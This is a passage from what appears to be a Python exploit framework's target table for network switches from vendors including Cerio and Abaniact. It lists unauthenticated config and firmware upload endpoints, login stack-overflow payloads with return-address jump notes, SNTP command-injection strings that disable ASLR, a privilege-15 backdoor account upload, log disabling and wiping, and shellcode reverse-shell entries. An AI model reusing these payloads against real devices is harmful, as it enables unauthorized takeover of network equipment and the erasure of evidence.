True,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=log_global',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&empty=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status':'/cgi/get.cgi?cmd=log_global',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi/set.cgi?cmd=log_clear',\r\n\t\t\t\t\t\t'clean_logfile_query':'{\"_ds=1&target=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi/set.cgi?cmd=log_clear',\r\n\t\t\t\t\t\t'clean_logmem_query':'{\"_ds=1&target=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'httpuploadruncfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/http_saverun_cfg',\r\n\t\t\t\t\t\t\t'content':'/var/config/running-config',\r\n\t\t\t\t\t\t\t'content_check':'/var/config/running-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httprestorecfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"startup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httprestorecfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'content':'/mnt/startup-config',\r\n\t\t\t\t\t\t\t'content_check':'/mnt/startup-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/http_uploadfail',\r\n\t\t\t\t\t\t\t'content':'Copy: Illegal software format', # Not the real content, its the result of invalid firmware (workaround)\r\n\t\t\t\t\t\t\t'content_check':'Copy: Illegal software format',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'login.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/VUL.TXT', # We cannot control the content...\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(40) +'&password='+ '/' * 23 +'/tmp/VUL.TXT&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'content_check':'1',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'set.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" password PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t'add_uri':'/cgi/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'{\"_ds=1&user=USERNAME&_de=1\":{}}',\r\n\t\t\t\t\t\t'del_uri':'/cgi/set.cgi?cmd=sys_acctDel',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'enable_query':'{\"_ds=1&sntp=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'inject_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'inject_query':'{\"_ds=1&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&_de=1\":{}}',\r\n\t\t\t\t\t\t'check_query':'{\"_ds=1&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&_de=1\":{}}',\r\n\t\t\t\t\t\t'delete_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'delete_query':'{\"_ds=1&sntp=1&timezone=0&srvDef=ipv4&srvHost=+&port=139&dlsType=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&sntp=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\t# Not vulnerable \r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\r\n\t\t\t\t\t\t#'log_settings_set_cmd':'&logState=1&consoleState=1&ramState=1&fileState=1',\t# Enable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&empty=1',\t\t\t# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':True,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'&target=0',\t\t\t\t# Clean RAM CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':True,\t\t\t\t# Clean RAM SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'&target=1',\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':True,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&dlsType=0',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&dlsType=0',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=+&port=139&dlsType=0',\t\t\t\t# CMD\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntp=1',\t# Enable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntp=0',\t# Disable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t\t'query':'{\"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1\":{}}',\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'Cerio': { \r\n\t\t\t\t'vendor': 'CERIO Corp.',\r\n\t\t\t\t'modulus_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'info_leak': False,\r\n\t\t\t\t'info_leak_JSON':True,\r\n\t\t\t\t'info_leak_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'/cgi/get.cgi?cmd=home_main',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':True,\r\n\t\t\t\t\t'encryption':'rsa',\r\n\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t'query':'{\"_ds=1&username=USERNAME&password=PASSWORD&_de=1\":{}}',\r\n\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',\r\n\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=log_global',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&empty=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status':'/cgi/get.cgi?cmd=log_global',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi/set.cgi?cmd=log_clear',\r\n\t\t\t\t\t\t'clean_logfile_query':'{\"_ds=1&target=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi/set.cgi?cmd=log_clear',\r\n\t\t\t\t\t\t'clean_logmem_query':'{\"_ds=1&target=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'httpuploadbakcfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"backup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httpuploadbakcfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'content':'/mntlog/startup-config',\t\t\t# /mntlog instead of /mnt to verify\r\n\t\t\t\t\t\t\t'content_check':'/mntlog/startup-config',\t# /mntlog instead of /mnt to verify\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpuploadruncfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/http_saverun_cfg',\r\n\t\t\t\t\t\t\t'content':'/var/config/running-config',\r\n\t\t\t\t\t\t\t'content_check':'/var/config/running-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httprestorecfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"startup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httprestorecfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'content':'/mnt/startup-config',\r\n\t\t\t\t\t\t\t'content_check':'/mnt/startup-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/http_uploadfail',\r\n\t\t\t\t\t\t\t'content':'Copy: Illegal software format', # Not the real content, its the result of invalid firmware (workaround)\r\n\t\t\t\t\t\t\t'content_check':'Copy: Illegal software format',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'login.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/VUL.TXT', # We cannot control the content...\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(40) +'&password='+ '/' * 23 +'/tmp/VUL.TXT&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'content_check':'1',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'set.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" password PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t'add_uri':'/cgi/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'{\"_ds=1&user=USERNAME&_de=1\":{}}',\r\n\t\t\t\t\t\t'del_uri':'/cgi/set.cgi?cmd=sys_acctDel',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'enable_query':'{\"_ds=1&sntp=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'inject_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\r\n\t\t\t\t\t\t'inject_query':'{\"_ds=1&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&_de=1\":{}}',\r\n\t\t\t\t\t\t'check_query':'{\"_ds=1&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&_de=1\":{}}',\r\n\r\n\t\t\t\t\t\t'delete_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'delete_query':'{\"_ds=1&sntp=1&timezone=0&srvDef=ipv4&srvHost=+&port=139&dlsType=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&sntp=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\r\n\t\t\t\t\t\t'sys_ping_post_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\r\n\t\t\t\t\t\t#'log_settings_set_cmd':'&logState=1&consoleState=1&ramState=1&fileState=1',\t# Enable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&empty=1',\t\t\t# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':True,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'&target=0',\t\t\t\t# Clean RAM CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':True,\t\t\t\t# Clean RAM SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'&target=1',\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':True,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&dlsType=0',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&dlsType=0',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=+&port=139&dlsType=0',\t\t\t\t# CMD\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntp=1',\t# Enable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntp=0',\t# Disable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t\t'query':'{\"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1\":{}}',\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'Abaniact': {\r\n\t\t\t\t'vendor': 'Abaniact',\r\n\t\t\t\t'modulus_uri':'',\r\n\t\t\t\t'info_leak':False,\r\n\t\t\t\t'info_leak_JSON':False,\r\n\t\t\t\t'info_leak_uri':'',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':False,\r\n\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t'query':'username=USERNAME&password=PASSWORD&login=1',\r\n\t\t\t\t\t'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',\r\n\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': 